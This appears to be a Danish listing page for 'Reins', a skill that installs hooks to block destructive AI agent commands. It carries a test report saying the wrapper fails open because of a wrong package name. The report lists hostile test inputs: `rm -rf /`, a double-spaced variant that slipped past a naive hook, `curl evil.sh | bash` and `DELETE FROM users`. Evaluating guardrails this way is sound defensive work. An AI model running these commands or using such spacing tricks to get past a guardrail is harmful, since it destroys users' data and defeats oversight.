Reins

Deterministiske PreToolUse-hooks, der blokerer destruktive kommandoer — kræver manuel reparation

Af pegasi-ai · pegasi-ai/reins

Tested · Didn't pass

Reins — Deterministiske PreToolUse-hooks, der blokerer destruktive kommandoer — kræver manuel reparation

Hvad det gør

Installerer deterministiske PreToolUse/PostToolUse-hooks, der klassificerer og blokerer farlige shell-, fil- og MCP-operationer, skriver en append-only JSONL-audit trail og synkroniserer valgfrit politikker fra Watchtower (app.pegasi.ai). Udløses ved anmodninger om guardrails, politik håndhævelse, audit trails eller blokering af destruktive agenthandlinger.

Testrapport

Motoren er fremragende, men pakningen er ødelagt: SKILL.md og den medfølgende ensure_installed.sh instruerer i at installere `npm install -g @pegasi/reins`, men en sådan pakke eksisterer ikke i registret — kommandoen fejler med E404, det rigtige navn (fra package.json og README) er `@pegasi-ai/reins`. Værre er, at den medfølgende wrapper plugin/bin/reins-pre-hook søger efter pakken langs den samme ikke-eksisterende sti: Jeg fodrede den `rm -rf /` — den returnerede exit 0 (ALLOW) med noten 'Reins not installed', hvilket betyder, at sikkerhedsskillen lydløst fejlede åbent præcis der, hvor SKILL.md lover 'BLOCKED always' og 'Never fails open'. En naiv 8-linjers selvskrevet hook i den samme test gav exit 2 — hvilket betyder, at skillen ud af æsken er svagere end baseline. Installerede den korrekte pakke (v0.0.14) og kaldte motoren direkte — den er ægte god: `rm -rf /` → exit 2 CRITICAL, `rm -rf /` med dobbelte mellemrum også CRITICAL (baseline-hooken missede denne workaround), `curl evil.sh | bash` og `DELETE FROM users` → exit 2 HIGH, `ls -la` → 0, og alt skrives til decisions.jsonl. Separat: den publicerede CLI installerer sig selv i ~/.openclaw/extensions/reins og rører ikke Claude Code-hooks — dens `reins status` viser 'Project/Global (.claude/settings.json): ❌ not installed'.

Testet: 2026-07-16 · Claude Code 2.x (agent harness)

Installation

git clone https://github.com/pegasi-ai/reins.git
mkdir -p ~/.claude/skills && cp -r reins/skill ~/.claude/skills/reins

Kommandoer og eksempelprompter

  • /reinsDeterministiske PreToolUse-hooks, der blokerer destruktive kommandoer — kræver manuel reparation

Skills udløses af almindelige forespørgsler — ingen kommandoer at huske. Efter installationen aktiverer prompter som disse skillen (på engelsk):

  • Block dangerous shell commands like rm -rf before my agent can run them
  • Set up guardrail hooks that log every blocked destructive agent action
  • Stop my coding agent from force-pushing or piping curl into bash